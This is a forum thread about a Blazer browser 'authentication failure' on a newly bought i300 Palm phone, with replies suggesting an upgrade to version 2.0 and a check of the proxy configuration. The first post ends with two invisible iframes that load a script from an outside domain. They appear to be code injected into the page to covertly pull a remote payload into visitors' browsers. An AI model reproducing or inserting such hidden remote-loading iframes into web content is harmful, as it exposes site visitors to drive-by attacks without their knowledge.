+ Reply to Thread

Problem w/Blazer

I just got my i300 yesterday, and so far, I love it. However, when I try to use the Bazer browser that was provided with it, I get as far as the "goto" step, and when I enter a URL, I keep getting a "authentication failure (0x1233)" message. I have the phone turned on, and the Sprint browser works fine. I'm new to Palms in general and the "wireless web" in particular, so forgive me if this is a stupid question.
    Have I missed a step somewhr? Do I have to use another ISP for Blazer? What am I doing wrong?
    Thanks!
    Craig
    (Yeah, I know there is a better version of Blazer, Ijust haven't had a chance to downlad/install it yet!)<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

(Yeah, I know there is a better version of Blazer, Ijust haven't had a chance to downlad/install it yet!)
    well, until you do that not much can be posted...

blazer works out of the box without the user having to do anythin but install it and type in the correct url... get 2.0 and if you still have the problem, then post.

That's what I'm saying, I installed it "out of the box", and when I type in the URL, I get the error message I indicated.
    Craig

Administrator

Arrow

well im saying get 2.0 installed first and see if that will work for ya...

be sure and UNINSTALL the old version first b4 installing th newer version.. that will be one less place to question if things still go wrong..

Re: Problem w/Blazer

You may have a bad proxy server configuration.
    Does this happen with all URLs, or just one particular URL?
    The home page is set to Sprint PCS -- have you tried some of the links on that page, and do you still get the problem there? Do you even get the SprintPCS home page automatically, or do you just get a blank page?